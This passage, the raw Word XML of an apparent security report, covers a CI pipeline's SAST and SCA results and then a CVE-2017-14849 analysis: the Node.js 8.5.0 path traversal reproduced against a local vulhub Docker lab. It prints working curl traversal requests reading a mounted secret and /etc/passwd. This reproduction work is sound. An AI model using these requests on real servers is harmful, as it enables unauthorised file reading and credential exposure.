        <w:t>found 0 vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terminal transcript: SAST and SCA results. Full JSON reports are in evidence/.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5544000" cy="3908066"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="shot-1-sast-sca.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5544000" cy="3908066"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Fig. 1  The three pipeline stages executed locally: 14/14 tests pass, SAST reports 0 errors and 1 warning, SCA reports 0 vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5544000" cy="3960000"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="shot-0-actions.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5544000" cy="3960000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Fig. 2  An earlier run of the same workflow: run #1 finished with status Success in 13 s. The annotation in the lower part is the SAST finding for src/security.js:78. The latest run is linked in section 2.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The single SAST warning is security/detect-object-injection in the output encoder. It is a false positive — the object keys are our own column names, not request data — and it is suppressed in place with a one-line justification rather than by disabling the rule for the whole project, so the rule keeps protecting the rest of the code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>One practical note that cost time and is worth recording: npm audit needs the registry advisory endpoint, and a mirror such as npmmirror answers [NOT_IMPLEMENTED] for /-/npm/v1/security/advisories/bulk. The audit stage therefore pins registry.npmjs.org explicitly; otherwise the SCA gate silently degrades into a command that always fails, and a check that always fails is soon ignored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5. CVE Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5.1 Identification</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4592"/>
        <w:gridCol w:w="4592"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CVE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CVE-2017-14849</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Affected product</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Node.js 8.5.0 (8.5.0 &lt;= version &lt; 8.6.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Weakness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-22 Improper Limitation of a Pathname to a Restricted Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>arbitrary file read outside the web root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fixed in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Node.js 8.6.0 (September 2017)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Scenario used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>vulhub/node/CVE-2017-14849 — Express 4.15.5 static server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5.2 The defect in one sentence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Node.js 8.5.0 rewrote how path.normalize() collapses .. segments and got it wrong when a .. follows an ordinary segment in the middle of a path, so the function silently removes traversal segments that should have survived; every framework that uses normalize() to keep file access inside a directory — express.static through the send module is the textbook case — then serves files from outside that directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5.3 Environment and reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The scenario runs in Docker, which is what the manual expects: the vulhub application is built into an image on the official node base image, and two images differ only in the runtime tag. The first run uses node:8.5.0, the second node:8.6.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t># cve/CVE-2017-14849/docker-compose.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  node:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    build: .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./www:/usr/src/www</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./secret.txt:/usr/src/secret.txt:ro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">      - "3000:3000"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The attack target is mounted into both images rather than copied into them. That is deliberate: if only the vulnerable image contained secret.txt, a 404 on the fixed image would prove nothing, because the file might simply be missing. Mounting it in both runs leaves the Node.js version as the only variable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ docker compose up -d --build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ docker compose exec node node --version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>v8.5.0</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curl --path-as-is -s -o /dev/null -w '%{http_code}' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">       http://127.0.0.1:3000/static/main.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>200</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curl --path-as-is -s 'http://127.0.0.1:3000/static/../foo/../../secret.txt'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>SECRET_FLAG{this-file-lives-outside-the-static-root}</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the request printed in the vulhub README: a system file instead</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ curl --path-as-is -s \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">       'http://127.0.0.1:3000/static/../../../a/../../../../etc/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terminal transcript: the traversal succeeds inside the container running Node 8.5.0, on a mounted file and on a system file that was never part of the image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Both runs were executed by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cve/CVE-2017-14849/verify-docker.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
